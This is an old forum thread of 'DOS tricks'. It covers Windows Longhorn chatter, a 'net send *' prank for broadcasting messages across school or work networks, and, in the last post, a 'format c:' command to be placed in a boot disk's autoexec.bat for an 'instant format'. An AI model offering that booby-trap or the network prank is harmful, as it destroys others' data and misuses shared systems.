Dos Tricks

Status
Not open for further replies.
harfenuegle said:
Have you guys heard about the Windows Longhorn command prompt? It's supposed to be extremely better.

I've heard there's even a graphical interface included with this one! :eek: :eek: :eek:

How do you access Windows Loghorn, or is it a separate software you have to purchase?

Windows Longhorn is Microsoft's next venture in Home Operating Systems.

Can't remember the release date, but the latest "leak" is still alpha I believe.

i've done this in school...and it's freakin hilarious...try it at work for those of you who are older....

open command prompt (run cmd on xp)

type net send * your message

this sends your message to everyone on the network, using the Windows Messenger service (different from MSN messenger)

For individual messages, replace the * (known as a wild card) with the computer name.

You may want to change your computer name to hacker as it sends like this

(Your Computer Name) sends to (Their computer name):
or something like that

*USE AT YOUR OWN RISK*

BlindApex said:
i've done this in school...and it's freakin hilarious...try it at work for those of you who are older....

open command prompt (run cmd on xp)

type net send * your message

this sends your message to everyone on the network, using the Windows Messenger service (different from MSN messenger)

For individual messages, replace the * (known as a wild card) with the computer name.

You may want to change your computer name to hacker as it sends like this

(Your Computer Name) sends to (Their computer name):
or something like that

*USE AT YOUR OWN RISK*

That is the exact reason I have disabled the Windows Messager service. :)

How about..

format c: /autodetect

This will format your C: no questions asked.

You put this on a boot disk and add this line to the autoexe.bat and instant format.

Please.... use wisely~

Status
Not open for further replies.
Back
Top Bottom